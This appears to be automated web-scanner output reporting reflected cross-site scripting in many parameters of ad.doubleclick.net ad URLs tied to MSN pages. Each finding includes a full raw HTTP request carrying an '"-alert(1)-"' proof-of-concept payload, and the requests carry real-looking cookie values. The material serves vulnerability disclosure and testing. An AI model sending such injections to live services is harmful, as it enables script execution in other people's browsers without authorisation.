GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908e97dd"-alert(1)-"9bf7dd8f0c5&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a80e"-alert(1)-"f1d880c1fb0 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=7048581277a80e"-alert(1)-"f1d880c1fb0&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2378f"-alert(1)-"aca77ed0aea was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb2378f"-alert(1)-"aca77ed0aea&destination=;ord=704858127? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af92a"-alert(1)-"cc3235c4e7d was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9ACaf92a"-alert(1)-"cc3235c4e7d&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225ef"-alert(1)-"0238af59b08 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353225ef"-alert(1)-"0238af59b08&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7913a"-alert(1)-"5a80d9941ef was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G7913a"-alert(1)-"5a80d9941ef&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1989"-alert(1)-"427b3fe4f34 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=d1989"-alert(1)-"427b3fe4f34 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5286c"-alert(1)-"52e38c0e3f5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!5286c"-alert(1)-"52e38c0e3f5&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://msn.careerbuilder.com/msn/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91be2"-alert(1)-"08c3a9c4724 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=817380091be2"-alert(1)-"08c3a9c4724&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c70"-alert(1)-"093128206cf was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=192992137780c70"-alert(1)-"093128206cf&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62386"-alert(1)-"8c43c31d0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f492162386"-alert(1)-"8c43c31d0&destination=;ord=1929921377? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92029"-alert(1)-"8fa74e1bff2 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB92029"-alert(1)-"8fa74e1bff2&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2466"-alert(1)-"9855290f93a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838c2466"-alert(1)-"9855290f93a&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a37e5"-alert(1)-"e3e4812a691 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=Ga37e5"-alert(1)-"e3e4812a691&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3154a"-alert(1)-"6f2ae5e4955 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=3154a"-alert(1)-"6f2ae5e4955 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b3a6"-alert(1)-"763dbf5867a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.100;sz=300x600;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003V/106000000000037334.1?!5b3a6"-alert(1)-"763dbf5867a&&PID=8173800&UIT=G&TargetID=28254838&AN=1929921377&PG=INVTXB&ASID=d4a508a476044cf197a9d19e016f4921&destination=;ord=1929921377? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc29d"-alert(1)-"63a898666d6 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801fc29d"-alert(1)-"63a898666d6&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 970af"-alert(1)-"c3c5aa073d6 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037970af"-alert(1)-"c3c5aa073d6&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc82d"-alert(1)-"c81877f4178 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83fc82d"-alert(1)-"c81877f4178&destination=;ord=1932086037? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae172"-alert(1)-"f6eedac639f was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXTae172"-alert(1)-"f6eedac639f&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5188d"-alert(1)-"a33579bde31 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=83082445188d"-alert(1)-"a33579bde31&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56f01"-alert(1)-"f34eea5e6e6 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G56f01"-alert(1)-"f34eea5e6e6&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4009"-alert(1)-"ec217f7248b was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=a4009"-alert(1)-"ec217f7248b HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e018"-alert(1)-"0e1e7727ec4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
